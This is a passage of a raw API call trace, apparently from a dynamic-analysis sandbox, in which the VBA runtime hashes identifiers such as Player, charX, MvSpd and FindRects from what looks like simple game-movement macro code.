0x105b4b [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="animY") returned 0x104c67 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aUP2") returned 0x10543e [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vbKeyRight") returned 0x1040ae [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="animY") returned 0x104c67 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aRIGHT2") returned 0x105ee7 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vbKeyDown") returned 0x100bcf [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="animY") returned 0x104c67 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aDOWN2") returned 0x104d9a [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="animX") returned 0x104c6a [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KeyIs") returned 0x104bf9 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Val") returned 0x10e2dd [0030.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.286] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MvSpd") returned 0x108690 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastCX") returned 0x109c18 [0030.286] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="LastCX" | out: _Dst="LastCX") returned 0x0 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastCY") returned 0x109c15 [0030.286] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="LastCY" | out: _Dst="LastCY") returned 0x0 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KeyIs") returned 0x104bf9 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="chs") returned 0x107e4c [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KeyIs") returned 0x104bf9 [0030.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="chs") returned 0x107e4c [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DiagMvSpd") returned 0x10a3ca [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="chs") returned 0x107e4c [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DiagMvSpd") returned 0x10a3ca [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KeyIs") returned 0x104bf9 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="chs") returned 0x107e4c [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KeyIs") returned 0x104bf9 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="chs") returned 0x107e4c [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DiagMvSpd") returned 0x10a3ca [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="chs") returned 0x107e4c [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DiagMvSpd") returned 0x10a3ca [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KeyIs") returned 0x104bf9 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="chs") returned 0x107e4c [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0030.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.288] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.288] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.288] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.289] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.289] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.289] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.289] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="sx" | out: _Dst="sx") returned 0x0 [0030.289] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="sy" | out: _Dst="sy") returned 0x0 [0030.289] CExposedStream::Read () returned 0x0 [0030.289] CExposedStream::Read () returned 0x0 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sy") returned 0x105f29 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ShipTo") returned 0x106c90 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uch") returned 0x10ddca [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastCY") returned 0x109c15 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ShipTo") returned 0x106c90 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uch") returned 0x10ddca [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RectsRet") returned 0x10b350 [0030.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastCY") returned 0x109c15 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charX") returned 0x10a443 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sx") returned 0x105f2c [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ShipTo") returned 0x106c90 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uch") returned 0x10ddca [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastCY") returned 0x109c15 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ShipTo") returned 0x106c90 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uch") returned 0x10ddca [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FindRects") returned 0x10ada5 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Player") returned 0x105b4b [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="S") returned 0x10106a [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="charY") returned 0x10a440 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.293] 